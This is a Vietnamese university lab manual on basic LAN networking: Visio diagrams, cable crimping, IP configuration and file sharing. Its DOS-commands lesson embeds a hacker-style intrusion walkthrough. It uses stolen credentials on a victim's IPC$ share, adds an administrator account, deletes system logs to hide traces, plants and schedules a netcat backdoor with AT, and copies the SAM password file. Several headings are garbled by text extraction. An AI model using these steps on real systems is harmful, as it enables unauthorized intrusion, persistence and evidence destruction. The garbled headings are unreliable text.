Những bài tập thực hành cơ bản nhất
Trang 1TRƯỜNG ĐẠI HỌC SƯ PHẠM KỸ THUẬT HƯNG YÊN
KHOA CÔNG NGHỆ THÔNG TIN
Đại họcChính quy
Trang 2MỤC LỤC
Bài 3 : Thực hành - THIẾT KẾ SƠ ĐỒ MẠNG 3
Bài 6: Thực hành - LÀM VIỆC VỚI CÁP MẠNG 10
Bài 7: Thực hành - KẾT NỐI MẠNG 20
Bài 12: Thực hành - CẤU HÌNH TCP/IP CHO MẠNG LAN 26
Bài 13: Thực hành - KHAI THÁC MẠNG LAN 30
Bài 15: Thực hành - KHAI THÁC MẠNG LAN (2) 40
Bài 17: Thực hành - QUẢN LÝ NGƯỜI DÙNG TRONG MẠNG LAN 46
Bài 19: Thực hành - SỬ DỤNG DỊCH VỤ WEB 55
Bài 20: Thực hành - SỬ DỤNG DỊCH VỤ THƯ ĐIỆN TỬ 60
Trang 3Bài 3 : Th c hành ực hành - THI T K S Đ M NG ẾT KẾ SƠ ĐỒ MẠNG ẾT KẾ SƠ ĐỒ MẠNG Ơ ĐỒ MẠNG Ồ MẠNG ẠNG
Mục tiêu
Sau khi học xong bài này, người học có khả năng:
- Sử dụng được phần mềm Visio để thiết kế các mô hình mạng LAN theoyêu cầu
- Phân tích, lựa chọn được mô hình mạng LAN và các thiết bị phù hợp vớiyêu cầu thực tế
- Rèn luyện khả năng làm việc độc lập, theo nhóm và khả năng trình bày vấnđề
Yêu cầu:
- Cài đặt được phần mềm thiết kế visio
- Sử dụng được các thành phần trong mềm thiết kế visio
- Thiết kế được mô hình mạng LAN theo yêu cầu cho trước
Hướng dẫn thực hiện:
1 Cài đ t đ ặt được phần mềm thiết kế visio ược phần mềm thiết kế visio c ph n m m thi t k visio ần mềm thiết kế visio ềm thiết kế visio ết kế visio ết kế visio
Bước 1: Cài đặt như cài đặt Word trong bộ Microsoft office
Cho đĩa DVD có bộ cài phần mềm Microsoft office vào ổ đĩa chạy file
setup.exe để bắt đầu cài chương trình, giao diện cài đặt như sau:
Trang 4Bước 2: Lựa chọn cài Microsoft Office Visio Professional 2007-> nhấn nút
continue, sau vài bước đơn giản bạn nhập key vào và hoàn thành việc cài đặt
Bước 3: Khởi động chương trình Visio ta có giao diện của chương trình như
sau:
2 Các chức năng chủ yếu
Office Visio 2007 cung cấp hàng loạt mẫu - biểu đồ tiến trình doanh nghiệp, biểu đồ mạng, biểu đồ công việc, mô hình cơ sở dữ liệu, và biểu đồ phần mềm, sử dụng để hình tượng hóa và sắp xếp các quá trình trong doanh nghiệp, các đề án và tài nguyên, sơ đồ mạng và tối ưu hệ thống
Tuy nhiên phần thực hành này chỉ giới thiệu và hướng dẫn phần vẽ sơ đồ mạng
Để thiết kế mạng chọn Network
Trang 5Bài 3.1: Sử dụng phần mềm Visio, thiết kế mô hình mạng sau:
Bước 1: Khởi động trình Visio
- Vào Start/ Program/ Microsoft office/ Microsoft office Visio 2007 (hoặc Click chuột kép vào biểu tượng Visio trên màn hình Desktop)
Bước 2: Lựa chọn mẫu trong Detailed Network Diagram/Create ta có giao diện
thiết kế như sau:
Trang 6Bước 3: Chọn các linh kiện cần thiết phục vụ quá trình thiết kế: (Phần mềm Visio
2007 hỗ trợ kéo thả các hình ảnh thiết bị) Để vẽ 1 Switch như ở mô hình mạng
trên, ta chọn menu Network Symbols (US units) rồi dùng chuột kéo thả vào page
hiện hành
Trang 7Bước 4: Để chọn được hình máy tính các loại chọn vào menu Computers and
Monitors (US units)
Bước 5: Để nối hình ảnh 2 thiết bị PC và Switch như trên hình vẽ chọn Connector
tool trên thanh menu ngang như hình vẽ dưới đây:
Sau đó thao tác như làm trên word:
Trang 8Làm tương tự các bước như trên ta tiếp tục thiết kế đúng như mô hình mạng yêucầu.
Bước 6: Để lưu lại chọn File/Save as
Để lưu lại thành file ảnh chọn File/Save As/Nhập vào tên file cần lưu/Save
Bước 7: Thoát khỏi trình Visio : Vào menu File/ Chọn Exit (hoặc nhấp vào
ở góc trên bên phải cửa sổ chính)
Trang 9Các bài tập tự làm:
Bài 3.2: Sử dụng phần mềm Visio, thiết kế mô hình mạng sau:
Bài 3.3: Dùng PM thiết kế Visio để thiết kế mô hình mạng như dưới đây:
Trang 10Bài 6: Thực hành - LÀM VI C V I CÁP M NG ỆC VỚI CÁP MẠNG ỚI CÁP MẠNG ẠNG
Mục tiêu
Sau khi thực hành xong bài này, người học có khả năng:
- Phân tích được ưu điểm và nhước điểm của các loại cáp truyền và đầu kếtnối thích hợp
- Sử dụng được kìm bấm để bấm đầu nối RJ45 vào cáp UTP theo các chuẩn
Trang 11giáo viên hướng dẫn
Hướng dẫn thực hiện:
Trước đây, khi network mới xuất hịên ở Việt Nam, vì giá thành các thiết bịmạng như HUB, SWITCH … rất cao, nên khi muốn nối 2 hay nhiều máy tính lạivới nhau, các kỹ sự thiết kế mạng ở VN dùng loại cáp đồng trục Cáp này trong lõichỉ có một sợi dây đồng, chạy một đường thẳng và có 2 đầu End Point
Sau đó, thiết bị phân nhánh trên mạng càng ngày càng được cải tiến và giáthành lại thấp Các kỹ sư mạng đã bắt đầu nghĩ tới việc đầu tư cho LAN một thiết
bị phân nhánh như Hub và Switch Theo đó, cáp mạng cũng thay đổi, không còn làdây Đồng Trục nữa mà là loại dây nhựa, lõi gồm nhiều dây nhỏ khác nhau Việcnày góp phần cải tiến tốc độ truyền dữ liệu một cách đáng kể trong mạng LAN Từmaximum 10Mpbs, nay có thể lên đến 1Gpbs đối với loại cable CAT 5 (loại thôngdụng) hiện nay
Cáp mạng CAT 5 UTP
Đầu cáp (Jack) RJ45 dành cho cáp UTP
Đặc điểm của loại cáp UTP như sau:
- Trong lõi gồm có 4 cặp dây xoắn với nhau theo từng cặp Mỗi cặp dây có màusắc riêng Một số nhà sản xuất cho mỗi dây một màu Nhưng dây chuyên nghiệpchỉ có 4 cặp màu Bao gồm 1 dây màu và một dây trắng sọc màu đó
Trang 124 cặp dây xoắn nhau và 4 cặp màu
- Bản thân các cặp dây xoắn cũng được thiết kế xoắn nhau ngay trong lõi nhựa củadây Bên trong lõi nhựa còn có các sợi nilon để tránh nhiễm điện cho dây
4 cặp dây cũng xoắn nhau trong lõi nhựa.
- Chiều dài giới hạn của dây cáp mạng nối giữa 2 thiết bị (PC, Hub, Switch,…) là
100 mét Nếu vượt quá giới hạn này, dữ liệu truyền đi sẽ bị nhiễu và mất Tuynhiên, trong kỹ thuật, giới hạn này chỉ cho phép là dưới 85 mét
- Khi bo cua (men theo góc tường), góc giới hạn của dây cáp phải từ 90o trở lên
Trang 13Nếu góc cua quá hẹp, ta có thể cuộn dây cáp thành vòng tròn ngay góc đó rồi đitiếp Nếu dây cáp bị bo góc dưới 90o thì dữ liệu sẽ bị mất hoặc nhiễu trên đườngdây
Các dụng cụ cần thiết để bấm đầu cáp mạng LAN:
Trang 15Các loại dây cáp:
- Cáp thẳng (Standard Cable 10baseT): loại này là loại thông dụng nhất trong LANbởi vì đa số PC đều nối vào Switch Không thể nối giữa 2 thiết bị cùng layer vớinhau được (ví dụ không thể nối Switch – Switch hay PC – Router)
- Cáp chéo (Cross-Over Cable): loại này dùng để nối các thiết bị cùng loại, cùnglayer với nhau Ví dụ: PC – PC, Router – Router, Switch – Switch, PC – Router …
- Cáp console: loại này rất hiếm khi dùng, chỉ dành cho các loại router hay Switchcủa các hãng lớn như Cisco Trên Router Cisco có một port gọi là Console, khicấm dây nối Router với PC, người ngồi trên PC có thể thiết lập cấu hình Routerthông qua Hyper Communication (trong Accessories) Ngày nay đa số các kỹ sưmạng dùng Telnet để cấu hình Router
Cách bấm cáp:
Đầu tiên cần phải xác định thứ tự các cọng cáp nhỏ trong sợi cáp mạng Theo quy định chuẩn thì số thứ tự các cọng cáp phải đi theo cặp Về màu sắc thì không có quy định chuẩn, bởi vì nhà sản xuất cáp có thể sản xuất màu khác nhau Nhưng mỗi cặp dây xoắn trong lõi cáp sẽ được đánh số theo cặp như sau:
Cặp dây 1 và 2 (rất quan trọng)
Cặp dây 3 và 6 (rất quan trọng)
Cặp dây 4 và 5 (không cần thiết)
Cặp dây 7 và 8 (không cần thiết)
Sơ đồ tham khảo:
Để tiện cho việc nâng cấp và sửa chữa sau này, nên dùng loại cáp của cùng nhà sản
Trang 16xuất (để có cùng màu) và ghi nhớ số thứ tự các cặp xoắn và màu sắc của chúng Mặt khác, phải xác định đúng vị trí pin của Jack RJ45 Việc này rất dễ dàng Bạn
có thể xem hình
Trước hết bạn cần quan sát kỹ đầu Jack RJ45, ứng với mỗi thanh đồng sẽ có mộtrãnh nhỏ Trong đầu cáp sẽ có 8 rãnh nhỏ dành cho 8 sợi cáp nhỏ Khi đã xác địnhpin như hình vẽ ở trên, bắt đầu cho những sợi cáp nhỏ vào theo thứ tự (chỉ làm 1đầu cáp, đầu còn lại sẽ tùy thuộc vào loại cáp ta sẽ làm)
Lưu ý là dây số 3 và dây số 6 là một cặp xoắn (trên hình là dây màu xanh lá cây và dây trắng sọc xanh lá cây).
Sau khi đã chắc chắn đầu cáp tiếp xúc với thanh đồng và chắc chắn vị trí dây nằmgọn trong các rãnh nhỏ, hãy dùng kềm bấm cáp bấm cố định nó luôn Đầu cáp cònlại sẽ tuỳ thuộc vào 1 trong 2 loại cáp “thẳng” hay cáp “chéo”
Bài 6.1 B m cáp m ng theo s đ th ng và chéo ấm cáp mạng theo sơ đồ thẳng và chéo ạng theo sơ đồ thẳng và chéo ơ đồ thẳng và chéo ồ thẳng và chéo ẳng và chéo
- Sơ đồ cáp thẳng:
Trang 17- Sơ đồ cáp chéo:
Trang 18Lưu ý, trong sơ đồ cáp chéo, đầu dây kia sẽ đảo thứ tự cặp cáp 1-2 và 3-6
Khi kiểm tra, để chúng gần nhau và quan sát màu và vị trí của chúng Nếu có đồ test cáp thi sẽ test như sau:
Đối với cáp thẳng: đèn cháy giữa đầu phát và đầu thu sẽ giống nhau theo thứ tự 1 –
2 – 3 – 6 – 4 – 5 – 7 – 8
Đối với cáp chéo: đèn sẽ phát theo tính hiệu như sau:
Trang 19Đầu phát —————— Đầu thu
- Cáp :tuỳ loại, giá dao động từ 1000 – 4000 / m
- Jack RJ45 : giao động từ 500 / cái – 7000 / cái (loại tốt nhất)
- Dao tuốt vỏ cáp và nhấn cáp: khoảng 15000 /cái
- Kềm bấm cáp: khoảng 105.000 / cái Ở Việt Nam bán loại của Trung Quốc, có thêm 1 lỗ bấm đầu jack RJ11 cho điện thoại luôn :
- Máy test cáp: khoảng 10 – 15 USD / cái
- Cáp cuộn 300 m : khoảng 275.000 – 450000 / cuộn, thùng
6.2 S d ng chính cáp v a b m ki m tra cáp s d ng test, k t n i tr c ụng chính cáp vừa bấm kiểm tra cáp sử dụng test, kết nối trực ừa bấm kiểm tra cáp sử dụng test, kết nối trực ấm kiểm tra cáp sử dụng test, kết nối trực ểm tra cáp sử dụng test, kết nối trực ụng chính cáp vừa bấm kiểm tra cáp sử dụng test, kết nối trực ết nối trực ối trực ực
ti p gi a 2 máy ết nối trực ữa 2 máy
6.3 S d ng cáp v a b m, ki m tra máy k t n i m ng Internet ụng chính cáp vừa bấm kiểm tra cáp sử dụng test, kết nối trực ừa bấm kiểm tra cáp sử dụng test, kết nối trực ấm kiểm tra cáp sử dụng test, kết nối trực ểm tra cáp sử dụng test, kết nối trực ết nối trực ối trực ạng Internet
Trang 20Bài 7: Th c hành - K T N I M NG ực hành ẾT KẾ SƠ ĐỒ MẠNG ỐI MẠNG ẠNG
Mục tiêu
Sau khi thực hành xong bài này, người học có khả năng:
- Kiểm tra được các đầu dây mạng UTP đã được bấm vào đầu RJ45
- Sử dụng được các thiết bị mạng như: Switch, Hub, máy tính kết nối lại với nhau để tạo thành mạng LAN
- Rèn luyện tính cẩn thận trong khi làm việc
Yêu cầu:
- Sinh viên tự lựa chọn được loại dây cáp(thẳng/chéo), và các chuẩnbấm dây(T568A/T568B) dựa theo các mô hình kết nối giáo viên đưa ra
để kết nối các thiết bị với nhau cho phù hợp
- Sử dụng cáp mạng để kết nối 2 máy tính trực tiếp
Hướng dẫn thực hiện:
Bước 1: Kiểm tra xem máy tính đã cài driver card mạng chưa, nếu chưa ta
phải cài đặt driver cho card mạng đó
- Click chuột phải vào My Computer/Chọn Drive Manage/Chọn Network Adapter/kiểm tra nếu thấy có biểu tượng mạng thì card mạng đã được cài, nếu không thì cần cài driver card mạng cho máy tính
Bước 2: Sau khi đã cài đặt hoàn chỉnh card mạng vào máy tính, ta cần khai
báo tên máy (Computer name) và tên nhóm (Workgroup) trước khi thử gởi thông điệp cho nhau (bằng lện NET SEND)
Nhấn chuột phải trên biểu tượng My Computer/chọn Properties/Trong cửa
sổ System Properties chọn mục Computer Name/chọn Change để mở cửa sổ Computer Name Changes/ Lần lượt khai báo Computer name và Workgroup/Sau
đó cần khởi động lại máy tính để việc thay đổi này có hiệu lực
Bước 3: Dùng lệnh NET SEND để thử gởi thông điệp giữa hai máy như
sau:
Trang 21Mở cửa sổ lệnh command bằng cách chọn menu Start\ chọn Run và Gõ vào lệnh cmd; (hoặc chọn từ menu Start để tìm và nhấn vào mục Command Prompt) ta có:
Bước 4: Gõ lệnh: NET SEND <Tên máy đích> Thông điệp, như trong hình
Để biết thêm chi tiết về lện này, bạn có thể gõ lệnh: NET SEND /?
Bài 7.2 S d ng các thi t b m ng, k t n i các máy tính thành m ng ụng chính cáp vừa bấm kiểm tra cáp sử dụng test, kết nối trực ết nối trực ị mạng, kết nối các máy tính thành mạng ạng Internet ết nối trực ối trực ạng Internet LAN theo các mô hình Star, Ring, Bus,
Bài 7.3 B ước đầu chia sẻ thông tin giữa các máy trong mạng c đ u chia s thông tin gi a các máy trong m ng ầu chia sẻ thông tin giữa các máy trong mạng ẻ thông tin giữa các máy trong mạng ữa 2 máy ạng Internet
Bài 9: Th c hành 4 ực hành - CÁC L NH DOS DÙNG CHO QU N TR ỆC VỚI CÁP MẠNG ẢN TRỊ Ị
M NG ẠNG
Mục tiêu
Sau khi thực hành xong bài này, người học có khả năng:
- Giải thích được cú pháp các lệnh của Dos dùng cho việc quản trị mạng
- Thao tác được các lệnh của Dos dùng cho việc quản trị mạng trên môhình mạng thực
- Rèn luyện tính cẩn thận trong khi làm việc
Yêu cầu:
- Sinh viên cần phân tích được cú pháp của các lệnh để thực hành
- Sinh viên phải thao tác được các lệnh cơ bản thường sử dụng
Hướng dẫn thực hiện:
Trang 22Trước hết bạn cần mở cửa sổ lệnh, bằng cách chọn menu Start và Run à Gõ vào lệnh cmd ; hoặc chọn từ menu Start để tìm và nhấn vào mục Command
Prompt
1 Lệnh Ping : Cú pháp: Code: ping ip/host [/t][/a][/l][/n]
- ip: địa chỉ IP của máy cần kiểm tra; host là tên của máy tính cần kiểm
tra Người ta có thể sử dụng địa chỉ IP hoặc tên của máy tính
- Tham số /t: Sử dụng tham số này để máy tính liên tục "ping" đến máy tínhđích, cho đến khi bạn bấm Ctrl + C
- Tham số /a: Nhận địa chỉ IP từ tên host
- Tham số /l : Xác định độ rộng của gói tin gửi đi kiểm tra Một số hacker
sử dụng tham số này để tấn công từ chối dịch vụ một máy tính (Ping of Death - một loại DoS), nhưng tôi nghĩ là hacker có công cụ riêng để ping một gói tin lớn như thế này, và phải có nhiều máy tính cùng ping một lượt
- Tham số /n : Xác định số gói tin sẽ gửi đi Ví dụ: ping 174.178.0.1/n 5 Công dụng : + Lệnh này được sử dụng để kiểm tra xem một máy tính có kết nối với mạng không Lệnh Ping sẽ gửi các gói tin từ máy tính bạn đang ngồi tới máy tính đích Thông qua giá trị mà máy tính đích trả về đối với từng gói tin, bạn có thểxác định được tình trạng của đường truyền (chẳng hạn: gửi 4 gói tin nhưng chỉ nhận được 1 gói tin, chứng tỏ đường truyền rất chậm (xấu)) Hoặc cũng có thể xác định máy tính đó có kết nối hay không (Nếu không kết nối,kết quả là Unknow host)
2 Lệnh Tracert : Cú pháp : Code: tracert ip/host
Công dụng : + Lệnh này sẽ cho phép bạn "nhìn thấy" đường đi của các gói tin từ máy tính của bạn đến máy tính đích, xem gói tin của bạn vòng qua các server nào, các router nào Quá hay nếu bạn muốn thăm dò một server nào đó
3 Lệnh Net Send, gởi thông điệp trên mạng (chỉ sử dụng trên hệ thống máy tình Win NT/2000/XP): Cú pháp: Net send ip/host thông_điệp_muốn_gởi
Trang 23Công dụng: + Lệnh này sẽ gửi thông điệp tới máy tính đích (có địa chỉ IP hoặc tên host) thông điệp: thông_điệp_muốn_gởi + Trong mạng LAN, ta có thể sử dụng lệnh này để chat với nhau Cũng có thể gởi cho tất cả các máy tính trong mạng
LAN theo cấu trúc sau : Code: Net send * hello!I'm pro_hacker_invn
4 Lệnh Netstat : Cú pháp: Code: Netstat [/a][/e][/n] - Tham số /a: Hiển thị tất cả
các kết nối và các cổng đang lắng nghe (listening) - Tham số /e: hiển thị các thông tin thống kê Ethernet - Tham số /n: Hiển thị các địa chỉ và các số cổng kết nối Ngoải ra còn một vài tham số khác, hãy gõ Netstat/? để biết thêm Công dụng : + Lệnh Netstat cho phép ta liệt kê tất cả các kết nối ra và vào máy tính của chúng ta
5 Lệnh IPCONFIG: Cú pháp: Code: ipconfig /all
Công dụng: + Lệnh này sẽ cho phép hiển thị cấu hình IP của máy tính bạn đang sử dụng, như tên host, địa chỉ IP, mặt nạ mạng
6 Lệnh FTP (truyền tải file): Cú pháp: Code: ftp ip/host Nếu kết nối thành công
đến máy chủ, bạn sẽ vào màn hình ftp, có dấu nhắc như sau: Code: ftp>_ Tại đây, bạn sẽ thực hiện các thao tác bằng tay với ftp, thay vì dùng các chương trình kiểu FTP, Flash FXP Nếu kết nối thành công, chương trình sẽ yêu cầu bạn nhập User name, Password Nếu username và pass hợp lệ, bạn sẽ được phép upload, duyệt file trên máy chủ Một số lệnh ftp cơ bản:
- cd thu_muc: chuyển sang thư mục khác trên máy chủ
- dir: Xem danh sách các file và thư mục của thư mục hiện thời trên máy chủ -
mdir thu_muc: Tạo một thư mục mới có tên thu_muc trên máy chủ
- rmdir thu_muc: Xoá (remove directory) một thư mục trên máy chủ
- put file: tải một file file (đầy đủ cả đường dẫn VD: c:\tp\bin\baitap.exe) từ máy
bạn đang sử dụng lên máy chủ
- close: Đóng phiên làm việc
- quit: Thoát khỏi chương trình ftp, quay trở về chế độ DOS command.
Ngoài ra còn một vài lệnh nữa Công dụng : + FTP là một giao thức được sửdụng để gửi và nhận file giữa các máy tính với nhau Windows đã cài đặt sẵn lệnh ftp, có tác dụng như một chương trình chạy trên nền console (văn bản), cho phép thực hiện kết nối đến máy chủ ftp
7 Lệnh Net View : Cú pháp: Code: Net View
[\\computer|/Domain[:ten_domain]] Công dụng: + Nếu chỉ đánh net view
[enter], nó sẽ hiện ra danh sách các máy tính trong mạng cùng domain quản lý với
Trang 24máy tính bạn đang sử dụng + Nếu đánh net view \\tenmaytinh, sẽ hiển thị các chia
sẻ tài nguyên của máy tính tenmaytinh Sau khi sử dụng lệnh này, các bạn có thể
sử dụng lệnh net use để sử dụng các nguồn tài nguyên chia sẻ này
8 Lệnh Net Use: Cú pháp: Code: Net use \\ip\ipc$ "pass" /user:"***" - ip: địa chỉ
IP của victim - ***: user của máy victim - pass: password của user Giả sử ta có đcuser và pass của victim có IP là 68.135.23.25 trên net thì ta đã có thể kết nối đến máy tính đó rùi đấy! Ví dụ: user: vitim ; pass :12345 Ta dùng lệnh sau: Code: Netuse \\68.135.23.25\ipc$ "12345" /user:"victim" Công dụng: + kết nói một IPC$ đếnmáy tính victim (bắt đầu quá trình xâm nhập)
9 Lệnh Net User : Cú pháp: Code: Net User [username pass] [/add] - Username :
tên user cấn add - pass : password của user cần add Khi đã add đc user vào rùi thì
ta tiến hành add user này vào nhóm administrator Code: Net Localgroup
Adminstrator [username] [/add]
Công dụng: + Nếu ta chỉ đánh lệnh Net User thì sẽ hiển thị các user có trong máy tính + Nếu ta đánh lệnh Net User [username pass] [/add] thì máy tính sẽ tiến hành thêm một người dùng vào Ví dụ: ta tiến hành add thêm một user có tên là uanhoa ,
password là :banvatoi vào với cấu trúc lệnh như sau: Code: Net User xuanhoa banvatoi /add Sau đó add user xuanhoa vào nhóm adminnistrator Code: Net
Localgroup Administrator xuanhoa /add
10 Lệnh Shutdown: Cú pháp: Code: Shutdown [-m \\ip] [-t xx] [-i] [-l] [-s] [-r] [-a] [-f] [-c "commet] [-d up x:yy] (áp dụng cho win XP)
- Tham số -m\\ip : ra lệnh cho một máy tính từ xa thực hiên các lệnh shutdown, restart,
- Tham số -t xx : đặt thời gian cho việc thực hiện lệnh shutdown
- Tham số -l : logg off (lưu ý ko thể thực hiện khi remote)
- Tham số -s : shutdown
- Tham số -r : shutdown và restart
- Tham số -a : không cho shutdown
- Tham số -f : shutdown mà ko cảnh báo
- Tham số -c "comment" : lời cảnh báo trước khi shutdown
- Tham số -d up x:yy : ko rõ Code: shutdown \\ip (áp dụng win NT) Để rõ hơn về lệnh shutdown bạn có thể gõ shutdown /? để được hướng dẫn cụ thể hơn! Công
Trang 25dụng: + Shutdown máy tính
11 Lệnh DIR: Cú pháp: Code: DIR [drive:][path][filename] Lệnh này quá căn
bản rùi, chắc tui khỏi hướng dẫn, để rõ hơn bạn đánh lệnh DIR /? để được hướng dẫn Công dụng: + Để xem file, folder
12 Lệnh DEL: Cú pháp: Code: DEL [drive:][path][filename] Công dụng: Xóa
một file, thông thường sau khi xâm nhập vào hệ thống, ta phái tiến hành xóa dấu vết của mình để khỏi bị phát hiện.Sau đây là những files nhật ký của Win NT: Code: del C:\winnt\system32\logfiles\*.* del C:\winnt\ssytem32\config\*.evt del C:\winnt\system32\dtclog\*.* del C:\winnt\system32\*.log del C:\winnt\system32\
*.txt del C:\winnt\*.txt del C:\winnt\*.log
13 Lệnh tạo ổ đĩa ảo trên computer: Cú pháp: Code: Net use z: \\ip\C$ ( hoặc là
IPC$ ) - Z là của mình còn C$ là của Victim Công dụng: Tạo 1 đĩa ảo trên máy tính (lệnh này tui ko rõ nên ko thể hướng dẫn chi tiết đc)
14 Lệnh Net Time: Cú pháp: Code: Net Time \\ip Công dụng: + Cho ta biết thời
gian của victim, sau đó dùng lệnh AT để khởi động chương trình
15 Lệnh AT: Cú pháp: Code: AT \\ip
Công dụng: + Thông thường khi xâm nhập vào máy tính victim khi rút lui thì ta sẽ copy trojan hoặc backdoor lên máy tính rùi ta sẽ dùng lệnh at để khởi động chúng
Ví dụ: ở đây trojan tên nc.exe (NC là từ viết tắc của NETCAT nó là một telnet server với port 99) và đc copy lên máy victim rùi Đầu tiên ta cần biết thời gian củavictim có IP là : 68.135.23.25 Code: Net Time \\68.135.23.25 Bây h nó sẽ phản hồi cho ta thời gian của victim, ví dụ : 12:00 Code: AT \\68.135.23.25 12:3 nc.exeĐợi đến 12:3 là nó sẽ tự chạy trên máy nạn nhân và chúng ta có thể connected đến port 99
16 Lệnh Telnet: Cú pháp: Code: telnet host port Gõ telnet /? để biết thêm chi
tiết Nhưng nếu như máy victim đã dính con nc rồi thì ta chỉ cần connect đến port
99 là được Code: telnet 68.135.23.25 99 Công dụng: + Kết nối đến host qua port
xx
17 Lệnh COPY: Cú pháp: Code: COPY /? Dùng lệnh trên để rõ hơn
Công dụng: + Copy file,
Ví dụ: Chúng ta copy files index trên ổ C của mình lên ổ C của 127.0.0.1 Code:
Copy Index.html \\127.0.0.1\C$\index.html nếu bạn copy lên folder winNt Code: Copy index.html \\127.0.0.1\admin$\index.html muốn copy files trên máy victm thì bạn gõ vào : Code: Copy \\127.0.0.1\Admin$\repair\sam._c:\
Trang 2618 Lệnh SET: Cú pháp: Code: SET Công dụng: + Displays, sets, or removes
cmd.exe enviroment variables
19 Lệnh Nbtstat: Cú pháp: Code: Nbtstat /? Gõ lệnh trên để rõ hơn về lệnh này.
Công dụng: + Display protocol statistic and curent TCP/IP connections using NBT(netbios over TCP?IP)
Bài 12: Th c hành ực hành - C U HÌNH ẤU HÌNH TCP/IP CHO M NG LAN ẠNG
Mục tiêu
Sau khi thực hành xong bài này, người học có khả năng:
- Nhận biết được địa chỉ mạng và địa chỉ mạng con của các máy tính trongmạng đang hoạt động
- Cấu hình được địa chỉ IP trên các PC trong mạng LAN theo yêu cầu
- Sử dụng được các lệnh và công cụ để kểm tra kết nối IP trong LAN
Yêu cầu:
- Xác định được giải địa chỉ sử dụng được để cấu hình cho máy
- Thiết lập được địa chỉ IP bằng dòng lệnh và thông qua giao diện đồ họacủa các máy tính trong mạng dựa theo sơ đồ và thông số cho trước
Hướng dẫn thực hiện:
Đưa ra mô hình mạng như sau:
Trang 27Bước 1: Cấu hình địa chỉ cho 2 máy tính PC1 và PC2 bằng dòng lệnh và đồ họa
với thông tin về địa chỉ IP như sau:
Máy PC1:
Cài Window XP
Gán địa chỉ Ip như sau:
Ip address: 192.168.1.2Subnet Mask: 255.255.255.0Default Gateway: 192.168.1.1
H
ướng dẫn:
Cấu hình địa chỉ IP tĩnh bằng dòng lệnh ta thao tác như sau:
Run->gõ cmd sau đó nhập lệnh sau:
Netsh interface ip set address local static 192.168.1.2 255.255.255.0 192.169.1.1 1
Để cấu hình địa chỉ IP tĩnh bằng đồ họa ta thao tác như sau:
Chọn Internet Protocol (TCP/IP) -> Properties
Trang 28Chọn Use the following IP address -> nhập địa chỉ IP, subnet mask-> ok
Trang 29Bước 2: Kiểm tra kết nối và độ liên thông của mạng bằng lệnh Ping
Sau khi cấu hình địa chỉ cho 2 máy, sử dụng lệnh Ping để kiểm
Từ máy PC2, vào Run-> gõ cmd -> gõ lệnh Ping 192.168.1.2Thực hiện lại bài thực hành trên với hệ thống địa chỉ ip như sau:
Máy PC1:
Cài Window XP
Gán địa chỉ Ip như sau:
Ip address: 172.66.1.2Subnet Mask: 255.255.255.0Default Gateway: 172.66.1.1
Máy PC2:
Cài Window XP
Trang 30 Gán địa chỉ Ip như sau:
Ip address: 172.66.1.33Subnet Mask: 255.255.255.0Default Gateway: 172.66.1.1
Bài 12.2 Cấu hình địa chỉ IP cho mạng LAN theo địa chỉ Lớp A, B, sau đó chia sẻ
thông tin giữa các máy
Bài 12.3 Cấu hình địa chỉ IP cho mạng LAN theo địa chỉ Lớp C có địa chỉ mạng
192.168.9.0 thành 4 mạng con khác nhau, sau đó chia sẻ thông tin giữa các máy
Bài 12.4 Cấu hình địa chỉ IP cho mạng LAN theo địa chỉ Lớp C có địa chỉ server
là: 192.168.9.1 sau đó chia sẻ thông tin giữa các máy
Bài 12.5 Cấu hình địa chỉ IP cho mạng LAN theo địa chỉ Lớp C có địa chỉ server
là: 192.168.9.1, địa chỉ Getway là: 192.168.9.1 sau đó chia sẻ thông tin giữa các máy
Bài 12.6 Cấu hình địa chỉ IP cho mạng LAN theo địa chỉ Lớp C có địa chỉ server
là: 192.168.1.1, địa chỉ Proxy là: 172.16.105.156 sau đó chia sẻ thông tin giữa các máy
Bài 13: Th c hành ực hành - KHAI THÁC M NG LAN ẠNG
Mục tiêu
Sau khi thực hành xong bài này, người học có khả năng:
- Chia sẻ được tài nguyên (dữ liệu) giữa các máy tính trong mạng LAN
- Tạo được các tài khoản người dùng trên windows XP
- Chia sẻ và quản lý được nguồn tài nguyên cho người dùng trên mạngLAN
- Có khả năng thực hiện chia sẻ tài nguyên trong LAN
Yêu cầu:
- Tạo được User và Group bằng dòng lệnh và đồ họa
- Chia sẻ được tài nguyên trong mạng Lan
Trang 31- Biết cách truy cập vào máy tính khác để lấy tài nguyên chia sẻ
Hướng dẫn thực hiện:
1 Đưa ra mô hình mạng như sau:
Hai máy tính PC1 và PC2 đã liên thông với thông tin về địa chỉ IP như sau:
Máy PC1:
Cài Window XP
Gán địa chỉ Ip như sau:
Ip address: 172.16.105.11Subnet Mask: 255.255.255.0Default Gateway: 172.16.105.1
Trang 32Ip address: 172.16.105.22
Subnet Mask: 255.255.255.0
Default Gateway: 172.16.105.1
Tạo User và Group bằng dòng lệnh và đồ họa
Add User vào Group
chia sẻ dữ liệu:
Trên máy PC1:- Tạo 2 user tên là a,b password 12345a@
Tạo Folder tên là ChiaseCông việc: - Phân quyền cho user a chỉ được phép đọc Folder Chiase
Phân quyền cho user b được phép đọc và ghi Folder Chiase
Thao tác trên Tab Sharing:
Yêu cầu: - Từ máy PC2 chỉ user b có quyền đọc, còn các user khác không được phép truy cập
Từ máy PC2 lấy dữ liệu từ Folder Chiase
Ngoài ra cho nhiều bài tập tình huống để sinh việc tư duy và rèn luyện
H
ướng dẫn :
Tạo user bằng dòng lênh:
Net user tenuser password /add
Trang 33Tạo user bằng đồ họa :
Click chuột phải vào My computer chọn manage
Click chuột phải chọn new user điền thông tin cần thiết: